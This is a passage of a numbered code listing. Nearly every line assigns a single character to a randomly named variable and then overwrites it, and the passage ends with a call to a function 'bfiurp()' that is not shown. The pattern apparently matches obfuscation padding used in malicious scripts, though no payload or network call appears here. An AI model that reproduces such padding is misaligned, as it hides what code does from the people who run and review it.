743 | xbrfsfvq = "V"; | |
744 | xbrfsfvq = "c"; | |
745 | dagehcb = "D"; | |
746 | dagehcb = "h"; | |
747 | dagehcb = "p"; | |
748 | dagehcb = "W"; | |
749 | efcehtc = "D"; | |
750 | efcehtc = "i"; | |
751 | efcehtc = "Q"; | |
752 | efcehtc = "M"; | |
753 | efcehtc = "B"; | |
754 | efcehtc = "e"; | |
755 | efcehtc = "."; | |
756 | pirswff = "L"; | |
757 | pirswff = "B"; | |
758 | pirswff = "V"; | |
759 | pirswff = "b"; | |
760 | pirswff = "f"; | |
761 | pirswff = "g"; | |
762 | pirswff = "k"; | |
763 | pirswff = "W"; | |
764 | pirswff = "o"; | |
765 | pirswff = "v"; | |
766 | pirswff = "J"; | |
767 | pirswff = "f"; | |
768 | pirswff = "g"; | |
769 | pirswff = "t"; | |
770 | pirswff = "h"; | |
771 | pirswff = "s"; | |
772 | pirswff = "P"; | |
773 | pirswff = "Y"; | |
774 | pirswff = "q"; | |
775 | pirswff = "p"; | |
776 | pirswff = "o"; | |
777 | pirswff = "x"; | |
778 | pirswff = "w"; | |
779 | pirswff = "G"; | |
780 | pirswff = "A"; | |
781 | pirswff = "U"; | |
782 | pirswff = "s"; | |
783 | pirswff = "d"; | |
784 | pirswff = "t"; | |
785 | pirswff = "u"; | |
786 | pirswff = "t"; | |
787 | pirswff = "H"; | |
788 | pirswff = "j"; | |
789 | pirswff = "h"; | |
790 | pirswff = "g"; | |
791 | pirswff = "a"; | |
792 | pirswff = "Z"; | |
793 | pirswff = "B"; | |
794 | pirswff = "k"; | |
795 | shxyq = "Z"; | |
796 | shxyq = "c"; | |
797 | shxyq = "z"; | |
798 | shxyq = "f"; | |
799 | shxyq = "W"; | |
800 | shxyq = "L"; | |
801 | shxyq = "Q"; | |
802 | shxyq = "x"; | |
803 | shxyq = "W"; | |
804 | shxyq = "R"; | |
805 | shxyq = "G"; | |
806 | shxyq = "w"; | |
807 | shxyq = "r"; | |
808 | shxyq = "I"; | |
809 | shxyq = "L"; | |
810 | shxyq = "K"; | |
811 | rtnphcoxw = "g"; | |
812 | rtnphcoxw = "x"; | |
813 | rtnphcoxw = "L"; | |
814 | rtnphcoxw = "S"; | |
815 | rtnphcoxw = "q"; | |
816 | rtnphcoxw = "o"; | |
817 | rtnphcoxw = "f"; | |
818 | rtnphcoxw = "g"; | |
819 | rtnphcoxw = "Z"; | |
820 | rtnphcoxw = "c"; | |
821 | rtnphcoxw = "-"; | |
822 | xozmnm = "n"; | |
823 | xozmnm = "d"; | |
824 | xozmnm = "e"; | |
825 | xozmnm = "G"; | |
826 | xozmnm = "o"; | |
827 | xozmnm = "H"; | |
828 | xozmnm = "g"; | |
829 | xozmnm = "F"; | |
830 | xozmnm = "H"; | |
831 | xozmnm = "F"; | |
832 | xozmnm = "u"; | |
833 | xozmnm = "Y"; | |
834 | xozmnm = "d"; | |
835 | xozmnm = "j"; | |
836 | xozmnm = "G"; | |
837 | xozmnm = "X"; | |
838 | xozmnm = "g"; | |
839 | xozmnm = "m"; | |
840 | xozmnm = "w"; | |
841 | xozmnm = "o"; | |
842 | xozmnm = "K"; | |
843 | xozmnm = "U"; | |
844 | xozmnm = "R"; | |
845 | xozmnm = "A"; | |
846 | xozmnm = "S"; | |
847 | xozmnm = "d"; | |
848 | xozmnm = "g"; | |
849 | xozmnm = "y"; | |
850 | xozmnm = "f"; | |
851 | xozmnm = "L"; | |
852 | xozmnm = "g"; | |
853 | xozmnm = "C"; | |
854 | xozmnm = "U"; | |
855 | ooraocvt = "e"; | |
856 | ooraocvt = "D"; | |
857 | ooraocvt = "X"; | |
858 | ooraocvt = "J"; | |
859 | ooraocvt = "P"; | |
860 | ooraocvt = "M"; | |
861 | ooraocvt = "A"; | |
862 | ooraocvt = "n"; | |
863 | ooraocvt = "b"; | |
864 | ooraocvt = "y"; | |
865 | ooraocvt = "w"; | |
866 | ooraocvt = "d"; | |
867 | ooraocvt = "V"; | |
868 | ooraocvt = "z"; | |
869 | ooraocvt = "u"; | |
870 | ooraocvt = "C"; | |
871 | ooraocvt = "v"; | |
872 | ooraocvt = "s"; | |
873 | ooraocvt = "b"; | |
874 | ooraocvt = "T"; | |
875 | ooraocvt = "f"; | |
876 | ooraocvt = "R"; | |
877 | ooraocvt = "x"; | |
878 | ooraocvt = "N"; | |
879 | ooraocvt = "E"; | |
880 | ooraocvt = "c"; | |
881 | ooraocvt = "Z"; | |
882 | ooraocvt = "F"; | |
883 | ooraocvt = "I"; | |
884 | ooraocvt = "o"; | |
885 | ooraocvt = "T"; | |
886 | ooraocvt = "m"; | |
887 | ooraocvt = "X"; | |
888 | ooraocvt = "h"; | |
889 | ooraocvt = "Y"; | |
890 | ooraocvt = "Q"; | |
891 | ooraocvt = "c"; | |
892 | ooraocvt = "m"; | |
893 | ooraocvt = "R"; | |
894 | ooraocvt = "J"; | |
895 | ooraocvt = "t"; | |
896 | ooraocvt = "F"; | |
897 | qayov = "P"; | |
898 | qayov = "l"; | |
899 | uterd = "l"; | |
900 | uterd = "B"; | |
901 | uterd = "V"; | |
902 | uterd = "p"; | |
903 | uterd = "H"; | |
904 | uterd = "f"; | |
905 | uterd = "P"; | |
906 | uterd = "V"; | |
907 | uterd = "K"; | |
908 | uterd = "c"; | |
909 | uterd = "I"; | |
910 | uterd = "i"; | |
911 | uterd = "Y"; | |
912 | uterd = "v"; | |
913 | uterd = "E"; | |
914 | uterd = "i"; | |
915 | uterd = "a"; | |
916 | uterd = "C"; | |
917 | uterd = "F"; | |
918 | uterd = "a"; | |
919 | uterd = "A"; | |
920 | uterd = "X"; | |
921 | uterd = "m"; | |
922 | uterd = "f"; | |
923 | entoilimo = "J"; | |
924 | entoilimo = "D"; | |
925 | entoilimo = "r"; | |
926 | entoilimo = "M"; | |
927 | entoilimo = "N"; | |
928 | puooct = "y"; | |
929 | puooct = "W"; | |
930 | puooct = "n"; | |
931 | puooct = "i"; | |
932 | puooct = "l"; | |
933 | puooct = "p"; | |
934 | puooct = "d"; | |
935 | puooct = "S"; | |
936 | puooct = "z"; | |
937 | puooct = "j"; | |
938 | puooct = "h"; | |
939 | puooct = "E"; | |
940 | puooct = "W"; | |
941 | puooct = "Q"; | |
942 | puooct = "o"; | |
943 | puooct = "x"; | |
944 | puooct = "h"; | |
945 | puooct = "B"; | |
946 | puooct = "J"; | |
947 | puooct = "s"; | |
948 | puooct = "q"; | |
949 | puooct = "u"; | |
950 | puooct = "y"; | |
951 | puooct = "J"; | |
952 | puooct = "A"; | |
953 | puooct = "N"; | |
954 | puooct = "E"; | |
955 | puooct = "M"; | |
956 | puooct = "n"; | |
957 | puooct = "w"; | |
958 | puooct = "D"; | |
959 | puooct = "h"; | |
960 | puooct = "W"; | |
961 | puooct = "N"; | |
962 | puooct = "0"; | |
963 | yzmmk = "L"; | |
964 | yzmmk = "b"; | |
965 | yzmmk = "F"; | |
966 | yzmmk = "t"; | |
967 | yzmmk = "H"; | |
968 | yzmmk = "v"; | |
969 | yzmmk = "b"; | |
970 | yzmmk = "N"; | |
971 | yzmmk = "O"; | |
972 | yzmmk = "S"; | |
973 | yzmmk = "c"; | |
974 | yzmmk = "t"; | |
975 | tlxsq = "L"; | |
976 | tlxsq = "m"; | |
977 | tlxsq = "S"; | |
978 | tlxsq = "j"; | |
979 | tlxsq = "G"; | |
980 | tlxsq = "w"; | |
981 | tlxsq = "c"; | |
982 | tlxsq = "p"; | |
983 | tlxsq = "g"; | |
984 | tlxsq = "j"; | |
985 | tlxsq = "M"; | |
986 | tlxsq = "S"; | |
987 | tlxsq = "s"; | |
988 | tlxsq = "s"; | |
989 | tlxsq = "a"; | |
990 | hptad = "m"; | |
991 | hptad = "X"; | |
992 | hptad = "K"; | |
993 | hptad = "Z"; | |
994 | hptad = "j"; | |
995 | hptad = "j"; | |
996 | hptad = "p"; | |
997 | hptad = "c"; | |
998 | hptad = "d"; | |
999 | hptad = "D"; | |
1000 | hptad = "D"; | |
1001 | hptad = "O"; | |
1002 | hptad = "S"; | |
1003 | hptad = "z"; | |
1004 | hptad = "m"; | |
1005 | lankdo = "G"; | |
1006 | lankdo = "\""; | |
1007 | gjkidxs = "m"; | |
1008 | gjkidxs = "t"; | |
1009 | gjkidxs = "o"; | |
1010 | gjkidxs = "B"; | |
1011 | gjkidxs = "E"; | |
1012 | gjkidxs = "i"; | |
1013 | gjkidxs = "k"; | |
1014 | gjkidxs = "g"; | |
1015 | gjkidxs = "l"; | |
1016 | gjkidxs = "T"; | |
1017 | gjkidxs = "r"; | |
1018 | gjkidxs = "a"; | |
1019 | gjkidxs = "x"; | |
1020 | gjkidxs = "N"; | |
1021 | gjkidxs = "z"; | |
1022 | gjkidxs = "V"; | |
1023 | gjkidxs = "A"; | |
1024 | gjkidxs = "P"; | |
1025 | gjkidxs = "B"; | |
1026 | gjkidxs = "V"; | |
1027 | gjkidxs = "m"; | |
1028 | gjkidxs = "D"; | |
1029 | gjkidxs = "p"; | |
1030 | gjkidxs = "B"; | |
1031 | gjkidxs = "F"; | |
1032 | gjkidxs = "h"; | |
1033 | gjkidxs = "Z"; | |
1034 | gjkidxs = "i"; | |
1035 | gjkidxs = "r"; | |
1036 | gjkidxs = "r"; | |
1037 | qfzxo = "Q"; | |
1038 | qfzxo = "h"; | |
1039 | qfzxo = "T"; | |
1040 | qfzxo = "m"; | |
1041 | qfzxo = "e"; | |
1042 | qfzxo = "B"; | |
1043 | qfzxo = "h"; | |
1044 | qfzxo = "l"; | |
1045 | qfzxo = "p"; | |
1046 | qfzxo = "D"; | |
1047 | qfzxo = "Z"; | |
1048 | qfzxo = "W"; | |
1049 | qfzxo = "S"; | |
1050 | qfzxo = "p"; | |
1051 | qfzxo = "n"; | |
1052 | qfzxo = "C"; | |
1053 | qfzxo = "F"; | |
1054 | qfzxo = "w"; | |
1055 | qfzxo = "A"; | |
1056 | qfzxo = "t"; | |
1057 | qfzxo = "s"; | |
1058 | qfzxo = "m"; | |
1059 | qfzxo = "z"; | |
1060 | qfzxo = "P"; | |
1061 | qfzxo = "7"; | |
1062 | chsxipfe = "B"; | |
1063 | chsxipfe = "B"; | |
1064 | chsxipfe = "R"; | |
1065 | chsxipfe = "Q"; | |
1066 | chsxipfe = "o"; | |
1067 | chsxipfe = "c"; | |
1068 | chsxipfe = "j"; | |
1069 | chsxipfe = "W"; | |
1070 | chsxipfe = "Y"; | |
1071 | chsxipfe = "q"; | |
1072 | chsxipfe = "U"; | |
1073 | chsxipfe = "w"; | |
1074 | chsxipfe = "g"; | |
1075 | chsxipfe = "S"; | |
1076 | chsxipfe = "l"; | |
1077 | chsxipfe = "q"; | |
1078 | chsxipfe = "D"; | |
1079 | chsxipfe = "B"; | |
1080 | chsxipfe = "o"; | |
1081 | chsxipfe = "w"; | |
1082 | chsxipfe = "B"; | |
1083 | chsxipfe = "p"; | |
1084 | chsxipfe = "I"; | |
1085 | chsxipfe = "g"; | |
1086 | chsxipfe = "i"; | |
1087 | chsxipfe = "r"; | |
1088 | chsxipfe = "S"; | |
1089 | chsxipfe = "f"; | |
1090 | chsxipfe = "H"; | |
1091 | chsxipfe = "u"; | |
1092 | chsxipfe = "Z"; | |
1093 | chsxipfe = "w"; | |
1094 | chsxipfe = "U"; | |
1095 | chsxipfe = "G"; | |
1096 | chsxipfe = "L"; | |
1097 | chsxipfe = "u"; | |
1098 | chsxipfe = "T"; | |
1099 | chsxipfe = "Y"; | |
1100 | prrlfej = "S"; | |
1101 | prrlfej = "n"; | |
1102 | prrlfej = "s"; | |
1103 | prrlfej = "q"; | |
1104 | prrlfej = "J"; | |
1105 | prrlfej = "T"; | |
1106 | prrlfej = "A"; | |
1107 | prrlfej = "W"; | |
1108 | prrlfej = "g"; | |
1109 | prrlfej = "l"; | |
1110 | prrlfej = "r"; | |
1111 | prrlfej = "c"; | |
1112 | prrlfej = "u"; | |
1113 | prrlfej = "o"; | |
1114 | prrlfej = "w"; | |
1115 | prrlfej = "L"; | |
1116 | prrlfej = "m"; | |
1117 | prrlfej = "J"; | |
1118 | prrlfej = "F"; | |
1119 | prrlfej = "N"; | |
1120 | prrlfej = "y"; | |
1121 | prrlfej = "p"; | |
1122 | mkhbohvi = "F"; | |
1123 | mkhbohvi = "N"; | |
1124 | mkhbohvi = "l"; | |
1125 | mkhbohvi = "M"; | |
1126 | mkhbohvi = "d"; | |
1127 | mkhbohvi = "e"; | |
1128 | mkhbohvi = "g"; | |
1129 | mkhbohvi = "K"; | |
1130 | mkhbohvi = "g"; | |
1131 | mkhbohvi = "P"; | |
1132 | mkhbohvi = "p"; | |
1133 | mkhbohvi = "B"; | |
1134 | mkhbohvi = "Y"; | |
1135 | mkhbohvi = "o"; | |
1136 | mkhbohvi = "g"; | |
1137 | mkhbohvi = "q"; | |
1138 | mkhbohvi = "f"; | |
1139 | mkhbohvi = "z"; | |
1140 | mkhbohvi = "y"; | |
1141 | mkhbohvi = "b"; | |
1142 | mkhbohvi = "w"; | |
1143 | mkhbohvi = "Y"; | |
1144 | mkhbohvi = "Q"; | |
1145 | mkhbohvi = "o"; | |
1146 | mkhbohvi = ":"; | |
1147 | pktrclqu = "Q"; | |
1148 | pktrclqu = "H"; | |
1149 | pktrclqu = "c"; | |
1150 | pktrclqu = "d"; | |
1151 | pktrclqu = "E"; | |
1152 | pktrclqu = "E"; | |
1153 | pktrclqu = "D"; | |
1154 | pktrclqu = "Q"; | |
1155 | pktrclqu = "K"; | |
1156 | pktrclqu = "d"; | |
1157 | pktrclqu = "n"; | |
1158 | pktrclqu = "E"; | |
1159 | pktrclqu = "x"; | |
1160 | pktrclqu = "Z"; | |
1161 | pktrclqu = "o"; | |
1162 | pktrclqu = "j"; | |
1163 | pktrclqu = "L"; | |
1164 | pktrclqu = "P"; | |
1165 | pktrclqu = "R"; | |
1166 | pdaojshxq = "f"; | |
1167 | pdaojshxq = "j"; | |
1168 | pdaojshxq = "r"; | |
1169 | pdaojshxq = "F"; | |
1170 | pdaojshxq = "X"; | |
1171 | pdaojshxq = "E"; | |
1172 | pdaojshxq = "l"; | |
1173 | pdaojshxq = "G"; | |
1174 | pdaojshxq = "w"; | |
1175 | pdaojshxq = "s"; | |
1176 | pdaojshxq = "c"; | |
1177 | pdaojshxq = "g"; | |
1178 | pdaojshxq = "M"; | |
1179 | pdaojshxq = "l"; | |
1180 | pdaojshxq = "x"; | |
1181 | pdaojshxq = "U"; | |
1182 | pdaojshxq = "i"; | |
1183 | pdaojshxq = "B"; | |
1184 | pdaojshxq = "A"; | |
1185 | pdaojshxq = "n"; | |
1186 | pdaojshxq = "B"; | |
1187 | pdaojshxq = "t"; | |
1188 | pdaojshxq = "t"; | |
1189 | pdaojshxq = "G"; | |
1190 | pdaojshxq = "p"; | |
1191 | pdaojshxq = "V"; | |
1192 | pdaojshxq = "U"; | |
1193 | pdaojshxq = "A"; | |
1194 | pdaojshxq = "V"; | |
1195 | pdaojshxq = "Z"; | |
1196 | pdaojshxq = "P"; | |
1197 | pdaojshxq = "v"; | |
1198 | pdaojshxq = "q"; | |
1199 | pdaojshxq = "M"; | |
1200 | pdaojshxq = "b"; | |
1201 | pdaojshxq = "w"; | |
1202 | pdaojshxq = "h"; | |
1203 | pdaojshxq = "p"; | |
1204 | pdaojshxq = "M"; | |
1205 | pdaojshxq = "9"; | |
1206 | omxqebora = "V"; | |
1207 | omxqebora = "b"; | |
1208 | omxqebora = "S"; | |
1209 | omxqebora = "e"; | |
1210 | omxqebora = "D"; | |
1211 | omxqebora = "s"; | |
1212 | omxqebora = "t"; | |
1213 | omxqebora = "I"; | |
1214 | omxqebora = "R"; | |
1215 | omxqebora = "c"; | |
1216 | omxqebora = "y"; | |
1217 | omxqebora = "T"; | |
1218 | omxqebora = "l"; | |
1219 | omxqebora = "w"; | |
1220 | omxqebora = "s"; | |
1221 | omxqebora = "D"; | |
1222 | omxqebora = "t"; | |
1223 | omxqebora = "o"; | |
1224 | omxqebora = "V"; | |
1225 | omxqebora = "S"; | |
1226 | omxqebora = "v"; | |
1227 | omxqebora = "k"; | |
1228 | omxqebora = "e"; | |
1229 | omxqebora = "f"; | |
1230 | omxqebora = "u"; | |
1231 | omxqebora = "k"; | |
1232 | omxqebora = "Y"; | |
1233 | omxqebora = "L"; | |
1234 | omxqebora = "q"; | |
1235 | omxqebora = "\\"; | |
1236 | tmaetmew = "K"; | |
1237 | tmaetmew = "C"; | |
1238 | tmaetmew = "k"; | |
1239 | tmaetmew = "g"; | |
1240 | tmaetmew = "X"; | |
1241 | tmaetmew = "c"; | |
1242 | tmaetmew = "P"; | |
1243 | tmaetmew = "w"; | |
1244 | tmaetmew = "b"; | |
1245 | tmaetmew = "L"; | |
1246 | tmaetmew = "n"; | |
1247 | tmaetmew = "h"; | |
1248 | tmaetmew = "f"; | |
1249 | tmaetmew = "o"; | |
1250 | tmaetmew = "c"; | |
1251 | tmaetmew = "s"; | |
1252 | tmaetmew = "W"; | |
1253 | tmaetmew = "D"; | |
1254 | tmaetmew = "o"; | |
1255 | tmaetmew = "h"; | |
1256 | tmaetmew = "L"; | |
1257 | tmaetmew = "U"; | |
1258 | tmaetmew = "b"; | |
1259 | tmaetmew = "e"; | |
1260 | dibodgyhx = "c"; | |
1261 | dibodgyhx = "n"; | |
1262 | dibodgyhx = "j"; | |
1263 | dibodgyhx = "E"; | |
1264 | dibodgyhx = "w"; | |
1265 | dibodgyhx = "v"; | |
1266 | dibodgyhx = "b"; | |
1267 | dibodgyhx = "V"; | |
1268 | dibodgyhx = "n"; | |
1269 | dibodgyhx = "O"; | |
1270 | dibodgyhx = "k"; | |
1271 | dibodgyhx = "H"; | |
1272 | dibodgyhx = "t"; | |
1273 | dibodgyhx = "t"; | |
1274 | dibodgyhx = "z"; | |
1275 | dibodgyhx = "L"; | |
1276 | dibodgyhx = "W"; | |
1277 | dibodgyhx = "q"; | |
1278 | dibodgyhx = "a"; | |
1279 | dibodgyhx = "R"; | |
1280 | dibodgyhx = "Z"; | |
1281 | dibodgyhx = "B"; | |
1282 | dibodgyhx = "i"; | |
1283 | dibodgyhx = "D"; | |
1284 | dibodgyhx = "G"; | |
1285 | dibodgyhx = "I"; | |
1286 | dibodgyhx = "q"; | |
1287 | dibodgyhx = "q"; | |
1288 | dibodgyhx = "a"; | |
1289 | dibodgyhx = "S"; | |
1290 | dibodgyhx = "h"; | |
1291 | dibodgyhx = "n"; | |
1292 | butxlcppu = "q"; | |
1293 | butxlcppu = "D"; | |
1294 | butxlcppu = "X"; | |
1295 | butxlcppu = "F"; | |
1296 | butxlcppu = "d"; | |
1297 | butxlcppu = "n"; | |
1298 | butxlcppu = "o"; | |
1299 | butxlcppu = "R"; | |
1300 | butxlcppu = "I"; | |
1301 | butxlcppu = "D"; | |
1302 | butxlcppu = "J"; | |
1303 | butxlcppu = "p"; | |
1304 | butxlcppu = "b"; | |
1305 | butxlcppu = "e"; | |
1306 | butxlcppu = "f"; | |
1307 | butxlcppu = "A"; | |
1308 | butxlcppu = "p"; | |
1309 | butxlcppu = "U"; | |
1310 | butxlcppu = "w"; | |
1311 | butxlcppu = "p"; | |
1312 | butxlcppu = "E"; | |
1313 | butxlcppu = "G"; | |
1314 | butxlcppu = "g"; | |
1315 | butxlcppu = "l"; | |
1316 | butxlcppu = "R"; | |
1317 | butxlcppu = "x"; | |
1318 | butxlcppu = "_"; | |
1319 | abaqx = "r"; | |
1320 | abaqx = "F"; | |
1321 | abaqx = "M"; | |
1322 | abaqx = "k"; | |
1323 | abaqx = "Z"; | |
1324 | abaqx = "h"; | |
1325 | abaqx = "r"; | |
1326 | abaqx = "I"; | |
1327 | abaqx = "m"; | |
1328 | abaqx = "g"; | |
1329 | abaqx = "C"; | |
1330 | abaqx = "C"; | |
1331 | abaqx = "q"; | |
1332 | abaqx = "K"; | |
1333 | abaqx = "V"; | |
1334 | abaqx = "R"; | |
1335 | abaqx = "H"; | |
1336 | abaqx = "h"; | |
1337 | abaqx = "R"; | |
1338 | abaqx = "5"; | |
1339 | tvrswoj = "d"; | |
1340 | tvrswoj = "q"; | |
1341 | tvrswoj = "a"; | |
1342 | tvrswoj = "u"; | |
1343 | tvrswoj = "b"; | |
1344 | tvrswoj = "j"; | |
1345 | tvrswoj = "E"; | |
1346 | tvrswoj = "j"; | |
1347 | tvrswoj = "p"; | |
1348 | tvrswoj = "r"; | |
1349 | tvrswoj = "t"; | |
1350 | tvrswoj = "G"; | |
1351 | tvrswoj = "l"; | |
1352 | tvrswoj = "Z"; | |
1353 | tvrswoj = "x"; | |
1354 | tvrswoj = "L"; | |
1355 | tvrswoj = "V"; | |
1356 | tvrswoj = "B"; | |
1357 | tvrswoj = "h"; | |
1358 | tvrswoj = "a"; | |
1359 | tvrswoj = "s"; | |
1360 | tvrswoj = "h"; | |
1361 | tvrswoj = "i"; | |
1362 | tvrswoj = "w"; | |
1363 | tvrswoj = "n"; | |
1364 | tvrswoj = "L"; | |
1365 | tvrswoj = "C"; | |
1366 | tvrswoj = "A"; | |
1367 | tvrswoj = "K"; | |
1368 | tvrswoj = "K"; | |
1369 | tvrswoj = "f"; | |
1370 | tvrswoj = "W"; | |
1371 | tvrswoj = "V"; | |
1372 | tvrswoj = "l"; | |
1373 | tvrswoj = "&"; | |
1374 | ddiama = "P"; | |
1375 | ddiama = "s"; | |
1376 | ddiama = "r"; | |
1377 | ddiama = "k"; | |
1378 | ddiama = "h"; | |
1379 | ddiama = "g"; | |
1380 | ddiama = "X"; | |
1381 | ddiama = "b"; | |
1382 | ddiama = "j"; | |
1383 | ddiama = "n"; | |
1384 | ddiama = "I"; | |
1385 | ddiama = "S"; | |
1386 | ddiama = "X"; | |
1387 | ddiama = "s"; | |
1388 | ddiama = "t"; | |
1389 | ddiama = "p"; | |
1390 | ddiama = "J"; | |
1391 | ddiama = "d"; | |
1392 | ddiama = "s"; | |
1393 | khtsb = "F"; | |
1394 | khtsb = "B"; | |
1395 | khtsb = "p"; | |
1396 | khtsb = "j"; | |
1397 | khtsb = "Q"; | |
1398 | khtsb = "Z"; | |
1399 | khtsb = "r"; | |
1400 | khtsb = "y"; | |
1401 | khtsb = "D"; | |
1402 | khtsb = "Q"; | |
1403 | khtsb = "I"; | |
1404 | khtsb = "w"; | |
1405 | khtsb = "m"; | |
1406 | khtsb = "g"; | |
1407 | khtsb = "o"; | |
1408 | khtsb = "E"; | |
1409 | khtsb = "q"; | |
1410 | khtsb = "K"; | |
1411 | khtsb = "b"; | |
1412 | khtsb = "j"; | |
1413 | khtsb = "H"; | |
1414 | khtsb = "T"; | |
1415 | khtsb = "J"; | |
1416 | khtsb = "b"; | |
1417 | khtsb = "A"; | |
1418 | khtsb = "o"; | |
1419 | khtsb = "W"; | |
1420 | khtsb = "m"; | |
1421 | khtsb = "o"; | |
1422 | khtsb = "D"; | |
1423 | khtsb = "v"; | |
1424 | khtsb = "w"; | |
1425 | khtsb = "v"; | |
1426 | khtsb = "r"; | |
1427 | khtsb = "L"; | |
1428 | khtsb = "L"; | |
1429 | khtsb = "v"; | |
1430 | khtsb = "t"; | |
1431 | khtsb = "q"; | |
1432 | khtsb = "z"; | |
1433 | khtsb = "c"; | |
1434 | khtsb = "R"; | |
1435 | khtsb = "f"; | |
1436 | khtsb = "N"; | |
1437 | khtsb = "I"; | |
1438 | bfiurp ( ); |
|